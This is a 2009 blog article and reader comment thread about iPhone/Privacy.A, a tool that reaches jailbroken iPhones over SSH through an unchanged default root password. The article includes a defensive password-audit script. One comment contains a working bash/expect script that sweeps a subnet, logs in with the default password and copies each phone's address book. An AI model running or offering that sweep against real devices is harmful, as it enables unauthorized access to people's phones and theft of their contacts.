Jailbreakers beware: iPhone malware evolves rapidly
Over the weekend there were reports of the "Rickrolling" worm that targeted jailbroken iPhones which had SSH installed and still used the default password. While definitely a security hole for those who enabled these features, the threat was more of a prank and "proof-of-concept" than anything truly malicious. Yesterday, however, antivirus and security software developer Intego released information on another worm that has been built to steal information from these iPhone users.
The article by Intego mentions the new worm, dubbed "iPhone/Privacy.A", takes advantage of the same vulnerability as the Rickrolling worm: an attacker's computer connects to the phone over SSH using the unchanged default root password and can then copy virtually any data off the phone it wants. Unlike the Rickrolling worm, however, this variant leaves no indication on the phone that it has been accessed.
Given that the Rickrolling worm publicized this vulnerability, it was only a matter of time before someone with truly malicious intent applied the same technique, and not surprisingly it took only days.
With this new malware, it is apparently very easy to compromise phones whose security has already been weakened, and the target audience is fairly large (Intego estimates that up to 8% of iPhones have been jailbroken). All an attacker has to do is run the tool on a PC connected to a shared or public network; it then scans that network for jailbroken iPhones and logs in to any that still accept the default root password.
The lesson of this second, quieter variant is simple: do not jailbreak your iPhone, especially if you are not aware of the risks, since other vulnerabilities besides this one may still be out there. If you suspect your phone has been accessed, reset it to factory settings and start over. For those who still wish to jailbreak their phones, you can protect yourself by changing the root password (and the password of the "mobile" user account, which ships with the same default). To do this, follow the steps outlined by David Martin over at CNET's iPhoneAtlas.
Keep in mind that if your iPhone is not jailbroken, you are not at risk from this malware; but if it is, and you have SSH enabled with the default password, be warned that nothing on the phone will indicate that this tool has been used against it.
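As an added example (not from the article, from Intego, or from the iPhoneAtlas guide), the check and the fix written as a shell script that you run on the phone itself, over SSH or from a terminal app, as root. It assumes that a fresh jailbreak ships /etc/master.passwd with the traditional DES-crypt hash of "alpine" for both root and mobile (the hash value below is that assumption; compare it against your own device before trusting the result), and that the jailbreak installed the BSD `passwd` utility, which the iPhoneAtlas steps also rely on. The sample master.passwd in the script is constructed for the demo.

```bash
#!/bin/sh
# Added example, not code from the CNET article or from Intego: find the
# accounts on a jailbroken iPhone that still use the default SSH password
# and rotate them. Run on the phone as root.
#
# Assumption: a fresh jailbreak ships /etc/master.passwd with the classic
# DES-crypt hash of "alpine" for both root and mobile. Both accounts must
# be changed; fixing root alone leaves mobile open to the same scan.
DEFAULT_HASH='/smx7MYTQIi2M'

# Print, one per line, the accounts in the given master.passwd whose hash
# still equals the default. Exit status 0 means at least one was found.
default_password_accounts() {
    awk -F: -v h="$DEFAULT_HASH" '$2 == h { print $1; found = 1 }
                                  END { exit !found }' "$1"
}

# Constructed sample standing in for /etc/master.passwd on a phone whose
# passwords were never changed (daemon shows what a locked account looks like).
make_sample_passwd() {
    cat > "$1" <<'EOF'
root:/smx7MYTQIi2M:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501::0:0:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
EOF
}

# Rotate every account still on the default. passwd prompts twice for the
# new password; use a different one per account, then re-run the check and
# confirm it prints nothing.
rotate_defaults() {
    for user in $(default_password_accounts "$1"); do
        echo "$user still uses the default password; changing it now"
        passwd "$user"
    done
}

# Stand-alone demo against the constructed sample. On a real phone use:
#   rotate_defaults /etc/master.passwd
if [ "${1:-}" = "--demo" ]; then
    sample=$(mktemp)
    make_sample_passwd "$sample"
    default_password_accounts "$sample"
    rm -f "$sample"
fi
```

Run `sh audit.sh --demo` to see the two default accounts reported from the sample; on the phone, `default_password_accounts /etc/master.passwd` gives the real answer and `rotate_defaults /etc/master.passwd` walks you through `passwd` for each one. The check matches the hash rather than attempting a login, so it works even if sshd is stopped, and it flags mobile as well as root, which a root-only password change would miss.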


1. There is a program that hackers run on a PC.
2. There is a worm that is installed on a jailbroken iPhone.
So, a PC sets up on a widely used public network and searches for iPhones that are jailbroken and contain the default SSH password. Though Topher did not state this implicitly in the article, he did correctly state that this program is a variation of the Rickrolling worm we saw a few days ago. The variation enables a PC to do the initial search and install any worm or other malware on jailbroken, default SSH password iPhones.
If you read my article from yesterday, this is exactly the "implications" I spoke of that could come from the Rick Astley demonstration. This program, derived from the original worm, is much more dangerous. It can be used to spread worms, install programs, or gain access to information on an infected iPhone.
So, this tech blog got it right. Topher was completely correct in his presentation of both programs and this has nothing to do with blowing things out of proportion. Because "consumer hackers" that jailbreak their iPhones typically do so without understanding the entire process, this hack could become seriously relevant ... and quickly. It is our responsibility to help get the word out so these things do not spread as quickly as they would otherwise.
Just link to something that says this is a self-replicating worm, because what you link to does not imply that at all. In fact it even says right in the last paragraph "While it is not possible to protect the iPhone from this hacker tool, it does not install anything on an iPhone"
I'm not downplaying the issue here, people using default / insecure / blank passwords is good reason why there are so many worms / viruses / malware and I'm quite surprised there has not been a 'real' iPhone worm until recently.
I just want people to use the right terms.
As I said before, I think the correct terms were used, perhaps not clearly enough.
"Yesterday, however, antivirus and security software developer Intego released information on another *worm* that has been built to steal information from these iPhone users.
The article by Intego mentions the *new worm*, dubbed "iPhone/Privacy.A""
(emphasis mine)
Intego never says it's a worm.
And I hate to cite wikipedia but, http://en.wikipedia.org/wiki/Computer_worm "A computer worm is a self-replicating computer program".
" This article was not implying that the "hacker tool" was a self-replicating worm"
I'm not trying to give you a hard time, but this article flat out says this tool is a worm, as I quoted above. Also, there is no such thing as a worm that does not self-replicate. The RickRolling worm *was a worm*, this *is not a worm*.
"That program exists due to code from the worm we reported earlier this week. " - What is your source on that?
Perhaps you are trying to link the fact that this one uses the same 'exploit' used in the worm, thus this new tool is also a worm? ...
#!/bin/bash
# Sweep a /24 and pull the address book off any host that still accepts
# the default root password "alpine" over SSH.
for ((a=1; a <= 254 ; a++))
do
    command=$(expect -c "
        set timeout 5
        spawn scp -o StrictHostKeyChecking=no root@10.0.0.$a:/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /tmp/$a.sqlitedb
        expect \"password:\"
        send \"alpine\r\"
        expect eof")
    echo "$command"
done
That does the same thing as this 'tool' (actually untested as my iPhone is in the car). Since it is using the same 'exploit', does that make this snippet of code a worm?
1. that just had to jailbreak their phones
and
2. downloaded something from the web they did not understand to achieve it
and
3. had no idea of the security risks involved
and
4. get nailed by this garbage
Apple told you so.
Description: Following the recent discovery of a worm that changes wallpaper on iPhones, Intego has spotted another piece of malware that attacks iPhones, one that is far more dangerous than the ikee worm. This hacker tool, which Intego identifies as iPhone/Privacy.A, takes advantage of the same vulnerability in the iPhone as the ikee worm, allowing hackers to connect to any jailbroken iPhone or iPod touch (iPhones or iPod touches hacked to allow installation of software other than through iTunes) whose owners have not changed the root password.
I have not altered it in any way, however, 'worm' is mentioned as is 'hacker tool' and 'malware'.
Intego is discussing the 'tool', software that runs from any computer and is used to scan for vulnerable iPhones.
The ikee worm was benign, this 'tool' or 'malware' is not. And from what Intego states it would appear to install a piece of malware that steals iPhone data on jailbroken iPhones that have NOT changed their SSH password.
Arguing over semantics is worthless. What is of worth is that there are a lot of iPhones that are jailbroken for whatever reason. I take it that not all are vulnerable, only if they are using SSH and have not changed the default password.
Advantage being taken of
1 - jailbroken iPhones
2 - using a tool on the iPhone to allow computer accesses via SSH
3 - being stupid enough to not change a password for a tool that gives deep access to the iPhone
This is akin to what I tell my service customers who still insist on not setting a proper OS X password on their computers and go on the internet. While the Mac OS is still not a virus/worm or other target, hackers will try to access your computers if they can.
Just don't make it easy for them to do so.
by kool_skatkat
November 23, 2009 7:36 AM PST
You'd think that the jailbreaking tool creators would at least make it safe for their users and automate the process. Unless their focus is not more security but less security if it provides more freedom.
If you lose money after jailbreaking your phone, do you get to sue the author of the tools?